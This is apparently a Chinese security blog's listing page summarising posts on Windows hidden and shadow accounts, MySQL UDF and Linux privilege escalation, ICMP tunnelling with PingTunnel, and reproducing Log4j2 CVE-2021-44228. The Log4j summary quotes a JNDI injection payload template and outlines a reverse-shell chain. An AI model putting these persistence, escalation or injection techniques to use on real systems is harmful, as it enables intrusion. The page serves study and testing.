- 博客(9)
- 收藏
- 关注
RSS订阅原创 Windows下隐藏账户和影子账户
在 Windows 攻防与内网渗透场景中,攻击者往往不会依赖显眼的管理员账户进行长期控制,而是通过隐藏账户或影子账户的方式实现权限维持与身份伪装。本文介绍 Windows 下两类常被提及的“隐藏账户”技术:以 $ 结尾的隐藏账户与基于注册表篡改的影子账户。
2025-12-20 23:16:27
1061
原创 Linux——MySQL UDF提权
UDF(User Defined Function,用户自定义函数)是 MySQL 提供的一种扩展能力,允许用户通过动态链接库(.so 文件)向 MySQL 增加新的函数功能。然而,如果数据库权限配置不当,攻击者可能利用 UDF 将恶意动态库写入 MySQL 插件目录,并通过 CREATE FUNCTION 加载执行,从而获得系统级命令执行权限。这类问题常见于 MySQL 配置不严、权限控制不当或操作系统文件权限不合理的场景。
2025-12-06 18:55:05
956
原创 Linux提权——多种常见提权方式全解析
Linux 提权(Privilege Escalation)是攻防演练中极其关键的环节。在拿到低权限账号后,如果无法提升至高权限(root),对系统进行持久化控制、横向移动、权限维持等动作都会受到限制。
2025-12-03 17:53:01
1613
原创 为什么 Pingtunnel NAT 模式下服务端看到的是宿主机 IP?虚拟化网络原理解析
VMware NAT 模式下虚拟机所有外出流量都被宿主机 NAT 服务做 SNAT,所以 Pingtunnel 等 TCP 隧道连接到外网服务端时,源 IP 也必然显示为宿主机 IP,而非虚拟机自身。
2025-11-24 12:20:58
434
原创 内网ICMP隧道搭建——PingTunnel
Pingtunnel 是一款把 TCP/UDP 数据封装进 ICMP(Ping)数据包中的隧道工具。当网络环境屏蔽 TCP/UDP 流量,但允许 ICMP(Ping)时,Pingtunnel 就能让你在被封锁的网络中继续访问外部服务。
2025-11-23 22:27:57
482
原创 win+R常用命令小记
在渗透测试、系统排查、内网安全和应急响应中,速度往往决定效率。Windows 的 运行窗口(Win + R) 是安全从业者打开系统关键管理组件最快的入口之一。
2025-11-17 22:50:54
1181
原创 UAC 限制下如何恢复 Win11 管理员权限
当默认用户被移出管理员组,内置 Administrator 被禁用,Windows 权限和 UAC 如何将你锁死
2025-11-12 17:50:43
1498
原创 log4j2 RCE漏洞(CVE‑2021‑44228)原理及复现(详细流程)
摘要:2021年末曝光的Log4j2漏洞(CVE-2021-44228)是近年来最具破坏力的安全漏洞之一。该漏洞源于Log4j2的JNDI查找功能,攻击者通过构造特殊日志消息(如${jndi:ldap://恶意地址})可实现远程代码执行。受影响版本包括2.0-beta9至2.14.1。漏洞利用过程包括:1)通过DNSLOG检测漏洞;2)利用JNDI注入工具建立RMI/LDAP服务;3)触发远程类加载实现反弹shell。修复方案包括升级至2.15.0+、禁用JNDI功能或移除相关类文件。该漏洞影响范围广,需加
2025-11-08 14:31:23
1365
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人